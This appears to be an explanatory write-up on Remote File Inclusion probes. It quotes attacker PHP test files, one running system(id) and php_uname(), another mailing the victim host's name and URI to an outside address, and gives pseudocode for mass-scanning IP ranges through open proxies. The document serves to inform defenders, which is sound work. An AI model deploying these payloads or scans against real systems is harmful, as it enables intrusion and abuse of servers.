Folowing codes are more than a single line, but have similiar purpose for testing the victims

$ckrid="Casper";
$ckrid=$ckrid."_";
$ckrid=$ckrid."Kae";
$ckrid=$ckrid."@yahoo";
$ckrid=$ckrid.".com";
$ckrid=$ckrid."
Ckrid
";
echo($ckrid);
die($ckrid);

If your system is vulnerable this returns as output: "Casper_Kae@yahoo.com" and "Ckrid" to the attacker.


### [!] CHECK [!] ###
$C1 = "MCNHERE";
$C2 = "BOSS";
$MCN = $C1.$C2;
### [!] CHECK [!] ###
### [!] MCNID [!] ###
echo($MCN);
### [!] MCNID [!] ###
die($MCN);


/***************************************************/
/* /******* C0d3d * by * hack`**********/ */
/* /# ** ~ RoxTeam[DOT]Net Comand ~ ** #/ */
/* /_________ C0d3d _ by _ hack`________/ */
/***************************************************/
$id = system(id);
$un = @php_uname();
echo "RoxTeam";
echo "uname -a: $un";
echo "id: $id";
exit;


### [!] CHECK [!] ###
$C1 = "DGBHERE";
$C2 = "BOSS";
$DGB = $C1.$C2;
### [!] CHECK [!] ###
### [!] DGBID [!] ###
echo($DGB);
### [!] DGBID [!] ###
die($DGB);





Following is another Remote File Inclusion attack, for testing if the attacker is able to send e-mails from your system.


// Inbox Tester 1.5
// Tester Generator
// Configuracoes:

$mail = "fracisco.batista@googlemail.com";
$nome = "Matrixxxxx, PRIV e BKKKK";
$de = "Inbox _BK_";
$assunto = "Chegou Inboxin";
$mensagem = 'S� os fortes sobrevivem ! EKIP-PA 2010' .$_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$mensagem = stripslashes($mensagem);
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: ".$nome." <".$de.">\r\n";
if (mail($mail, $assunto, $mensagem, $headers)) {
echo " Sim ";
} else {
echo "erro";
}

One of the tests given above is saved with a name similar to one of this names. Since the size of this test file is extremely small, it is possible to scan thousands of IP numbers with all possible options, without taking the attention of nobody is very easy. Let me try to explain in a style for everyone:

Let "OldVictim" is the host where hacked previously (or a public file sharing service) and the test file saved with one of these names,
"TestFile" is the file as described above,
"ProxyServer" is the host with an open web proxy service,
"RequestStrings" is the array of request strings for known buggy softwares,
"IPrange" is a range of IP numbers (eg: abc.def.0.1 to abc.def.255.255)

For each of the IP numbers in IPrange Do Followings:
For each of the RequestStrings Do Followings:
Tell ProxyServer to retrieve http://IPNumber/BuggySoftware=http://OldVictim/TestFile
if returned output from ProxyServer equals "ShiroHige" or "FeelCoMz" save this IP somewhere for the real attack
:End of Inner Loop
:End of Outer Loop